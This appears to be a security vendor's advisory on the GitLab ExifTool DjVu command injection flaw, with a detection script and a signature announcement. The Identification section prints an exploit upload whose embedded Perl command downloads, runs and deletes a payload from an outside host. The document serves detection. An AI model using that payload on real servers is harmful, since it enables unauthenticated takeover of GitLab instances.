
GitLab Unauthenticated Remote ExifTool Command Injection

Updated: Jul 1, 2022



Application Details

GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.


Vulnerability

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files before passing them to a file parser, which allowed an unauthenticated remote attacker to achieve remote command execution.


Identification

Files uploaded with a jpg, jpeg or tiff extension are passed to ExifTool to strip any tags that are not on the allowed list. The problem is that ExifTool ignores the file extension and determines the file type from the content, so a file of another format renamed to .jpg is handed to that format's parser. The request below uploads a DjVu document as test.jpg; the (metadata ...) block in its ANTa annotation chunk carries a Perl qx#...# command substitution, which ExifTool's DjVu metadata parser evaluates, running the embedded wget command on the GitLab server.



Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary

AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO...
......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44.....
FORM....DJVIANTa...P(metadata
	(Copyright "\
" . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \
" b ") )

Detection

By turning this vulnerability into a traffic file and a matching rule, we are able to detect attempts to upload files whose actual content does not match the declared content type or file extension.
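The check described in the Identification and Detection sections, as an added example that is not GitLab's, ExifTool's or Idappcom's code: it reads the leading bytes of an uploaded part the way ExifTool chooses a parser, compares that with the extension and Content-Type the client declared, and, when the content is DjVu, looks in the annotation chunk for Perl command substitution. The two multipart parts at the bottom are constructed sample input (the DjVu chunk lengths are placeholders, and the command is a harmless `id`), not captured traffic; the function and header names are this example's own.

```python
"""Added example (not GitLab's, ExifTool's or Idappcom's code): flag an
uploaded image whose real format, read from its leading bytes, does not
match the extension and Content-Type it was declared with, and look inside
DjVu annotation chunks for Perl command substitution.  The multipart parts
at the bottom are constructed sample input, not captured traffic."""
import re

# Leading bytes ("magic") for the formats GitLab hands to ExifTool, plus the
# DjVu container that ExifTool will parse when it arrives named *.jpg.
MAGIC = {
    "jpeg": [b"\xff\xd8\xff"],
    "tiff": [b"II*\x00", b"MM\x00*"],
    "djvu": [b"AT&TFORM"],
}
EXT_TO_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "tif": "tiff", "tiff": "tiff"}
MIME_TO_TYPE = {"image/jpeg": "jpeg", "image/tiff": "tiff"}

# Heuristic: Perl qx<delim>...<delim> or a backtick inside DjVu metadata.
PERL_EXEC = re.compile(rb"qx[^\w\s]|`")


def sniff_type(data):
    """Return the format implied by the leading bytes (as ExifTool does),
    or None if none of the known signatures match."""
    for fmt, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return fmt
    return None


def parse_part(part):
    """Split one multipart body part into (lower-cased header dict, body)."""
    head, _, body = part.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode()] = value.strip().decode()
    return headers, body


def check_upload(part):
    """Compare declared extension/MIME type with sniffed content and return
    a verdict dict; 'reasons' is empty for an upload that looks consistent."""
    headers, body = parse_part(part)
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    filename = m.group(1) if m else ""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    declared_ext = EXT_TO_TYPE.get(ext)
    mime = headers.get("content-type", "").lower()
    declared_mime = MIME_TO_TYPE.get(mime)
    actual = sniff_type(body)

    reasons = []
    if declared_ext and actual != declared_ext:
        reasons.append("extension .%s but content sniffs as %s" % (ext, actual))
    if declared_mime and actual != declared_mime:
        reasons.append("Content-Type %s but content sniffs as %s" % (mime, actual))
    # "ANTa" is the DjVu annotation chunk that carries the (metadata ...) block.
    if actual == "djvu" and b"ANTa" in body and PERL_EXEC.search(body):
        reasons.append("DjVu annotation chunk contains Perl command substitution")
    return {"filename": filename, "actual": actual,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample parts.  Chunk lengths in the DjVu sample are placeholders;
# only the leading bytes and the ANTa payload matter to the checks above.
BENIGN_JPEG_PART = (
    b'Content-Disposition: form-data; name="file"; filename="photo.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16 + b"\xff\xd9"
)
DJVU_AS_JPEG_PART = (
    b'Content-Disposition: form-data; name="file"; filename="test.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n"
    b"Content-Transfer-Encoding: binary\r\n\r\n"
    b"AT&TFORM\x00\x00\x00\x40DJVMDIRM" + b"\x00" * 8 +
    b"FORM\x00\x00\x00\x20DJVIANTa\x00\x00\x00\x18"
    b'(metadata (Copyright "\\\n" . qx#id# . \\\n" b ") )'
)

if __name__ == "__main__":
    for part in (BENIGN_JPEG_PART, DJVU_AS_JPEG_PART):
        print(check_upload(part))
```

The magic-byte comparison is the part worth putting in front of the parser: an upload that claims to be JPEG but sniffs as DjVu never needs to reach ExifTool at all. The qx/backtick scan is a heuristic for this payload family and will not catch every way of smuggling Perl into a DjVu annotation, so treat it as a detection signal rather than a substitute for the content-type check.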


Coverage

Idappcom has created signature 8021990 along with a traffic file.


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional


1 Comment


cup cun
Jul 17

Curious about the technical details behind a photograph, like camera settings, shutter speed, or even GPS location if embedded? An EXIFReader tool online lets you upload an image and view this detailed EXIF (Exchangeable Image File Format) data to better understand your photos.
